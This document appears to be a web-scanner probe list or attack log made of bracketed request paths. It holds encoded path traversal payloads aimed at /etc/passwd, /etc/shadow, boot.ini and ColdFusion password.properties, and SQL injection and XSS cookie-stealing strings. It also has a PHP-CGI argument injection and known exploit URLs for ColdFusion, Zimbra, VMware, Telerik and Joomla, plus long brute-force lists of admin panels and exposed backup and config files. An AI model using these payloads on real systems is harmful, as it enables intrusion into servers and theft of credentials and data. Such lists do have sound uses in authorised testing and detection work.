[%2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd]
[%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fboot%2Eini]
[%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd]
[%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot%2Eini]
[%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd]
[%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd]
[%2F%2Fetc%2Fpasswd]
[%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini]
[%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini]
[..\\..\\..\..\\..\..\\..\..\\\boot.ini]
[/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini]
[/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%2fpasswd]
[/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini]
[/..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini]
[/../../../../../../../../../../boot.ini]
[/../../../../../../../../../../etc/passwd]
[/../../../../../../../etc/passwd]
[/..\..\..\..\\..\..\\..\..\\\boot.ini]
[/..\/..\/..\/boot.ini]
[/..\/\..\/\..\/\boot.ini]
[/.git/HEAD]
[/.htaccess,/.htpasswd,/_vti_bin/,/_vti_cnf/,/_vti_log/,/_vti_pvt/,/_vti_txt/,/postinfo.html,/_vti_bin/_vti_aut/author.dll]
[/.svn/text-base/.htpasswd.svn-base,/.svn/text-base/Web.config.svn-base,/.git/HEAD,/.hg/requires,/.bzr/README,/downloadFile.php,/BackupConfig.php,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini]
[///..%2f..%2f..%2f..%2fboot.ini]
[////..\..\..\boot.ini]
[//cmdownloads/?CMDsearch=%22.base64_decode%28%22amFsZnVqbm5rbW5hcXlr%22%29.%22]
[//cmdownloads/?CMDsearch=%22.base64_decode%28%22ZGFjdHNtYWZocndtaGFw%22%29.%22]
[/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input]
[/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000]
[/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42]
[/?p4yl04d2=1%20UNION%20ALL%20SELECT%201,2,3,table_name%20FROM%20information_schema.tables,/?p4yl04d3=<script>alert(document.cookie)</script>]
[/?p4yl04d=../../../../../../../../../../../../../../../../../etc/passwd]
[/adm.php,/affiliate.php,/adm_auth.php,/memberadmin.php,/administratorlogin.php,/account.cfm,/admin/account.cfm,/admin/index.cfm,/admin/login.cfm]
[/admin.cfm,/admin/admin_login.cfm,/admin_login.cfm,/adminpanel.cfm,/admin/controlpanel.cfm,/admincontrol.cfm,/panel-administracion/login.cfm,/admin/cp.cfm]
[/admin/admin-login.jsp,/admin-login.jsp]
[/admin/admin.cfm]
[/admin/adminLogin.jsp,/home.jsp,/adminarea/index.jsp,/adminarea/admin.jsp,/adminarea/login.jsp,/panel-administracion/index.jsp,/panel-administracion/admin.jsp,/modelsearch/index.jsp]
[/admin/cp.jsp,/cp.jsp,/administrator/account.jsp,/administrator.jsp,/login.jsp,/modelsearch/login.jsp,/moderator.jsp,/moderator/login.jsp]
[/administrator/index.cfm,/modelsearch/admin.cfm,/panel-administracion/index.cfm,/adminarea/login.cfm,/adminarea/admin.cfm,/adminarea/index.cfm,/admin/adminLogin.cfm,/webadmin/login.cfm]
[/administrator/login.jsp,/moderator/admin.jsp,/controlpanel.jsp,/user.jsp,/admincp/index.jsp,/admincp/login.jsp,/admincontrol.jsp,/admin/account.jsp]
[/adminpanel.jsp,/webadmin.jsp,/webadmin/index.jsp,/webadmin/admin.jsp,/webadmin/login.jsp,/admin/admin_login.jsp,/admin_login.jsp,/panel-administracion/login.jsp,/adminLogin.jsp]
[/admin_area/index.jsp,/bb-admin/index.jsp,/bb-admin/login.jsp,/bb-admin/admin.jsp,/admin/home.jsp,/admin/controlpanel.jsp,/admin.jsp,/pages/admin/admin-login.jsp]
[/atom.xml,/atom.jsp,/rss/,/rss.aspx,/rss.php,/rss.xml,/rss.jsp,/etc/passwd,/boot.ini]
[/axis2-admin/,/_sys/,/admin_cp.asp,/sitecore/admin/,/sitecore/login/admin/,/backup/,/backup,/backup.sql,/backup.sql.gz]
[/backup.sql.bz2,/backup.zip,/backups/,/bak/,/back/,/cache/backup/,/admin/backup/,/dbbackup.txt,/b.sql]
[/bb-admin/index.cfm,/bb-admin/login.cfm,/bb-admin/admin.cfm,/siteadmin/index.cfm,/memberadmin.cfm,/admin2/login.cfm,/admloginuser.cfm,/admincontrol/login.cfm]
[/CFIDE/adminapi/administrator.cfc?method=login&adminpassword=&rdsPasswordAllowed=true]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]
[/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en]
[/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en]
[/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en]
[/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en]
[/CFIDE/administrator/entman/index.cfm,/cfide/install.cfm,/CFIDE/administrator/archives/index.cfm,/CFIDE/wizards/common/_logintowizard.cfm,/CFIDE/componentutils/login.cfm,/CFIDE/Administrator/startstop.html,/common/help/en/go/login_ts.html,/system/login/]
[/CFIDE/administrator/images/loginbackground.jpg]
[/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd]
[/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\log\dbpwdChange.log,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb,/Info.live.htm,/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config]
[/db.sql,/ddb.sql,/users.sql,/database.sql,/mysql.sql,/dump.sql,/respaldo.sql,/data.sql,/old.sql]
[/fckeditor/editor/filemanager/upload/test.html,/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html,/fckeditor/editor/filemanager/connectors/php/config.php,/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php,/includes/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp,/includes/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx,/includes/FCKeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm]
[/flexfm/,/lib/usermanagement/userInfo.php,/security/xamppsecurity.php,/system/console,/dm-albums/dm-albums.php,/ibm/console/logon.jsp?action=OK,/console/,/console/portal/0/Welcome]
[/happyaxis.jsp,/web-console/ServerInfo.jsp,/web-console/Invoker,/invoker/JMXInvokerServlet,/invoker/,/jmx-console/,/admin-console/,/CFIDE/administrator/enter.cfm]
[/help/../../etc/shadow]
[/images/printer.gif,/printer/image,/images/mute_alloff.gif,/images/pic_bri.gif,/scanweb/images/scanwebtm.gif,/view/index.shtml,/phpmyadmin/,/phpMyAdmin/]
[/img/cake.icon.png,/js/vendors.php,/cgi-bin/ffileman.cgi?,/fshow.php,/admin/upload.php]
[/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)]
[/jmx-console/]
[/log.aspx,/log.jsp,/logs/,/logs.htm,/logs.php,/logs.asp,/logs.aspx,/logs.jsp]
[/login.stm,/tools_admin.php,/bsc_lan.php,/Manage.tri,/logo_t.gif,//system.html,/main_configure.cgi,/OvCgi/Toolbar.exe]
[/modelsearch/admin.jsp,/administrator/index.jsp,/admincontrol/login.jsp,/adm/admloginuser.jsp,/admloginuser.jsp,/admin2.jsp,/admin2/login.jsp,/admin2/index.jsp]
[/modelsearch/index.cfm,/panel-administracion/admin.cfm,/adm/admloginuser.cfm,/adm.cfm,/adm_auth.cfm,/administratorlogin.cfm,/webadmin.cfm,/webadmin/index.cfm]
[/modelsearch/login.cfm,/login.cfm,/administrator.cfm,/administrator/account.cfm,/adminLogin.cfm,/siteadmin/login.cfm,/admin2/index.cfm,/adm/index.cfm,/admin_area/index.cfm]
[/mxportal/home/en_US/servicetools.gif,/mxportal/home/MxPortalFrames.jsp,/xymon/menu/menu.css,/rrc.htm,/manager/html/upload,/manager/html,/axis2/axis2-web/HappyAxis.jsp,/axis2/]
[/NETWARE.HTM,/setup.cgi,/debug.cgi,/ehcp/?op=applyforftpaccount,/ehcp/?op=applyforaccount,/ehcp/?op=applyfordomainaccount,/vhosts/ehcp/?op=applyforftpaccount,/vhosts/ehcp/?op=applyforaccount]
[/noindex/css/bootstrap.min.bak]
[/noindex/css/bootstrap.min.css.~1~]
[/noindex/css/bootstrap.min.css~]
[/noindex/css/Copy%20(2)%20of%20bootstrap.min.css]
[/noindex/css/Copy%20(2)%20of%20open-sans.css]
[/noindex/css/open-sans.bak]
[/noindex/css/open-sans.css.~1~]
[/noindex/css/open-sans.css~]
[/pages/admin/admin-login.cfm,/admincp/index.cfm,/admincp/login.cfm,/admin_area/admin.cfm,/admin_area/login.cfm,/moderator/login.cfm,/administrator/login.cfm,/moderator.cfm]
[/phpmy-admin/,/mysqladmin/,/mysql-admin/,/websql/,/_phpmyadmin/,/footer1.gif,/homepage.nsf/homePage.gif?OpenImageResource,/icons/ecblank.gif]
[/pictures/buttons/file_view_mark.gif,/cpqlogin.htm?RedirectUrl=/&RedirectQueryString=,/hplogo.gif,/ie_index.htm,/ilo.gif,/images/icon_server_connected.gif,/mxhtml/images/signin_logo.gif,/mxhtml/images/status_critical_15.gif]
[/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00,/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234,/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20,/d41d8cd98f00b204e9800998ecf8427e.php,/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0,/rom-0,/Telerik.Web.UI.DialogHandler.aspx?dp=////]
[/scripts/WPnBr.dll]
[/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml]
[/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E//etc/vmware/hostd/vmInventory.xml]
[/sdk/../../../../../../../etc/vmware/hostd/vmInventory.xml]
[/sdk/../../../../../..//etc/vmware/hostd/vmInventory.xml]
[/server-status]
[/servers/,/server_stats/,/serverstats/,/server-status/,/service/,/services/,/servicio/,/servicios/,/servlet/]
[/siteadmin/login.aspx,/siteadmin/index.aspx,/account.jsp,/admin/index.jsp,/admin/login.jsp,/admin/admin.jsp,/admin_area/admin.jsp,/admin_area/login.jsp]
[/stlog.nsf,/streg.nsf,/stsrc.nsf,/userreg.nsf,/vpuserinfo.nsf,/webadmin.nsf,/web.nsf,/.nsf/../winnt/win.ini,/icons/ecblank.gif]
[/Telerik.Web.UI.DialogHandler.ashx?dp=////,/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=////,/uir//etc/passwd,/uir//tmp/csman/0,/cgi-bin/export_debug_msg.exp,/cgi-bin/config.exp,/,/readme.html,/]
[/tiny_mce/plugins/filemanager/,/upload/scp/ajax.php,/cgi-mod/view_help.cgi,/cgi-mod/index.cgi,/cgi-mod/smtp_test.cgi,/TopToolArea.html,/switchSystem.html,/intruvert/jsp/module/Login.jsp]
[/tomcat/manager/html/,/tomcat/manager/status/,/tomcat/manager/text/,/cognos_express/manager/html/,/host-manager/html/,/host-manager/text/,/tomcat/host-manager/html/,/tomcat/host-manager/text/,/system/console]
[/ts/in.cgi?open2]
[/upload_multiple_js.php,/uploadtester.asp,/info.php,/phpinfo.php,/kusabax/manage_page.php,/plus/lurking.php,/adm/barra/assetmanager/assetmanager.php,/eyeos/]
[/vhosts/ehcp/?op=applyfordomainaccount,/tools_admin.cgi?,/level/15,/exec/show/log/CR,/level/15/exec/-/configure/http,/level/15/exec/-,/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report,/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report]
[/wp%-login]
[/wp-config.bak]
[/wp-config.php.bak]
[/wp-config.php~]
[/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../dev/null%00]
[/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00]
[/zp-core/,/amember/,/.hgignore,/.gitignore,/.bzrignore,/debug.seam,/CSS/Miniweb.css,/S7Web.css,/Portal0000.htm]
[/\../\../\../boot.ini]
[/_vti_bin/_vti_aut/author.exe,/_vti_bin/_vti_aut/dvwssr.dll,/_vti_bin/_vti_adm/admin.dll,/_vti_bin/_vti_adm/admin.exe,/_vti_bin/fpcount.exe?Page=default.asp|Image=3,/_vti_bin/shtml.dll,/_vti_bin/shtml.exe,/_vti_pvt/_x_todo.htm]
[/_vti_pvt/services.org,/_vti_pvt/structure.cnf,/_vti_pvt/svcacl.cnf,/_vti_pvt/users.pwd,/_vti_pvt/uniqueperm.cnf,/_vti_pvt/writeto.cnf,/.svn/,/.svn/text-base/.htaccess.svn-base]
[/~1*/*.aspx?aspxerrorpath=/]
[/~1/*.aspx?aspxerrorpath=/]
[/~root]
[index.html?../../../../../boot.ini]
[index.html?..\..\..\..\..\boot.ini]
[\\..%2f..%2f..%2f..%2fboot.ini%]
